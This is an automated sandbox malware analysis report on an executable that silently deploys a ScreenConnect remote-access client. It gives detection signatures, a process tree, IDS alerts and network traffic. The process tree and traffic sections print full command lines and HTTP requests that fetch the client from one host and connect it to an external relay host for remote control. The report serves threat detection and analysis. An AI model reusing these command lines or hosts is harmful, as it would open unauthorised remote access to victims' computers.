Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3coxOaV92n.exe

Overview

General Information

Sample name:3coxOaV92n.exe
renamed because original name is a hash value
Original sample name:8b6c29b6418b96950df0f4d56e90f1d1b25c08ced164e8a3f83b61601a674c71.exe
Analysis ID:1542318
MD5:8baaa006991b70783ed369d3ca853ca3
SHA1:c4821ff42774877ea91eb582da7a98cbea853dae
SHA256:8b6c29b6418b96950df0f4d56e90f1d1b25c08ced164e8a3f83b61601a674c71
Tags:exesecure-stansup-comsigneduser-JAMESWT_MHT
Infos:

Detection

ScreenConnect Tool
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • 3coxOaV92n.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\3coxOaV92n.exe" MD5: 8BAAA006991B70783ED369D3CA853CA3)
    • dfsvc.exe (PID: 3056 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 5244 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6620 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6520 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 940 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 7080 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
    • ScreenConnect.WindowsClient.exe (PID: 6572 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 3056JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1816JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                9.0.ScreenConnect.WindowsClient.exe.c10000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6620, ProcessName: svchost.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-25T19:29:27.806051+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549722TCP
                  2024-10-25T19:29:29.798570+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549723TCP
                  2024-10-25T19:29:35.382472+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549732TCP
                  2024-10-25T19:29:37.121763+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549735TCP
                  2024-10-25T19:29:39.555616+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549753TCP
                  2024-10-25T19:29:45.467567+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549780TCP
                  2024-10-25T19:29:46.823210+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549791TCP
                  2024-10-25T19:29:49.300665+020020098971A Network Trojan was detected79.110.49.185443192.168.2.549803TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Multi AV Scanner detection for submitted file
                  Source: 3coxOaV92n.exeReversingLabs: Detection: 23%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.3% probability
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior

                  Compliance

                  barindex
                  EXE planting / hijacking vulnerabilities found
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Uses 32bit PE files
                  Source: 3coxOaV92n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  PE / OLE file has a valid certificate
                  Source: 3coxOaV92n.exeStatic PE information: certificate valid
                  Uses secure TLS version for HTTPS connections
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49791 version: TLS 1.2
                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                  Source: 3coxOaV92n.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Binary contains paths to debug symbols
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 3coxOaV92n.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100089000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420666021.0000000005142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3285857919.0000000002411000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474342978.0000000001290000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2408865216.0000000000C6D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100085000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420807529.00000000051F2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC4A4B FindFirstFileExA,0_2_00AC4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior

                  Networking

                  barindex
                  Enables network access during safeboot for specific services
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.5:49839 -> 79.110.49.185:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 79.110.49.185 79.110.49.185
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49722
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49735
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49732
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49723
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49780
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49803
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49791
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49753
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: secure.stansup.comAccept-Encoding: gzip
